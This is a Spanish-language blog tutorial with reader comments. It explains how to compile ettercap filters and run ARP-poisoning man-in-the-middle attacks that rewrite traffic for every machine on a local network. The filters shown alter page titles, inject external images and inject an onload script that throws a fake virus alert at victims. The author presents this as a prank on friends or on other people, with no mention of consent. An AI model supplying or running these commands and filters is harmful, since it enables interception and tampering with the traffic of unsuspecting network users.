Les motraré cómo crear filtros simples para usar con ettercap, para que podamos modificar parte del tráfico como tags html, conversaciones de chat, etc.
Para esto necesitamos obviamente instalar el suit ettercap-ng, lo podemos descargar desde Sitio oficial ettercap
Haremos las pruebas con el sitio http://www.google.cl, modificaremos el título, el contenido, la imágen, etc.
Para este ejemplo vamos a crear un filtro llamado google.filter. Lo creamos usando nuestro editor de texto preferido, en mi caso vim:
$ vim google.filter
En él escribimos:
-
replace("</title>", "</titleee>");
-
replace("<title>", "<title>Gooooooogle</title><titleee>");
Guardamos y compilamos el filtro usando etterfilter:
$ etterfilter google.filter
Nos creará un fichero llamado filter.ef, que es el que usaremos.
Ejecutamos ettercap y aplicamos el filtro:
# ettercap -Tq -M arp:remote -i interface -F filter.ef // //
Ahora cualquier pc de la red, cuando ingrese a Google, verá el título modificado.
Podemos modificar el tag o información que queramos, no solo html, sino todo el tráfico de la red.
Por ejemplo, si queremos modificar la o las imágen de un sitio:
-
replace("\<img", "\<img src=http://direccion..de/la/imagen/que/quieres_insertar.jpg\> \<aaa");
nota: Con todo esto, lo que estámos haciendo es modificar cualquier información que este viajando por la red, no solo las páginas web, si hacen la prueba y escriben <img por msn, verán que ettercap automáticamente lo reemplazará por lo que especificamos en el filtro.
Tambien podemos especificar que sólo queremos jugar con el protocolo http y la web agregando la siguiente condición a nuestro filtro:
-
if (ip.proto == TCP && tcp.src == 80) {
-
[…] acá las acciones
-
}
Aprendiendo a aplicar e implementar estos filtros podemos hacer una infinidades de cosas divertidas, ya sea para fastidiar a algun amigo o simplemente para joder a los demás. Es cosa de usar la imaginación, por ejemplo, el siguiente filtro:
-
replace("\<body", "\<body onload=\"alert(‘Usted tiene un virus.’);confirm(‘Chupamela?’);\"\>");
Hará que cuando alguien ingrese a cualquier sitio aparezca una alerta diciendo que tiene un virus y luego, para joderle un poco más, una ventana de confirmación.
en 
en 
en
6 respuestas hasta ahora ↓
1
// Dic 7, 2008 a las 7:01 pm
» Creando filtros simples para ettercap > Insecurity
[...] Link Crear filtros en ettercap [...]
2
Nozelf 
// Dic 8, 2008 a las 12:04 am
Fue bien productivo el rato que estuvimos jugando con ettercap.
3
// Abr 19, 2009 a las 12:46 am
Creando filtros simples para ettercap -- InSecurity [Dot] CL - InSecurity Team Group
[...] Link Crear filtros en ettercap [...]
4
Andres 
// Oct 22, 2009 a las 10:39 am
Puedo jugar con ettercap, en mi casa, sin tener un red?
hice estas pruebas y me tira el siguiente mensaje:
Content filters loaded from filter.ef…
Listening on interface…
ERROR : 19, No such device
[ec_capture.c:capture_init:146]
pcap_open: SIOCGIFHWADDR: No such device
es porque no estoy en una red, o porque estoy haciendo algo mal?
Muchas Gracias.
saludos
5
Zerial 
// Oct 22, 2009 a las 11:19 am
@Andres: El parametro “-i interface” define la interface que usaras para capturar los paquetes. El error “No such device” hace referencia a que no encuentra el dispositivo especificado. La interface debe ser tu tarjeta etherner o wireless, generalmente eth0, eth1, eth…, ethN o bien wlan0, …wlanN.
saludos
6
andres 
// Oct 22, 2009 a las 5:47 pm
Gracias zerial, tratare de indicarle el dispositivo que en mi caso es eth0.
Saludos
Deja un Comentario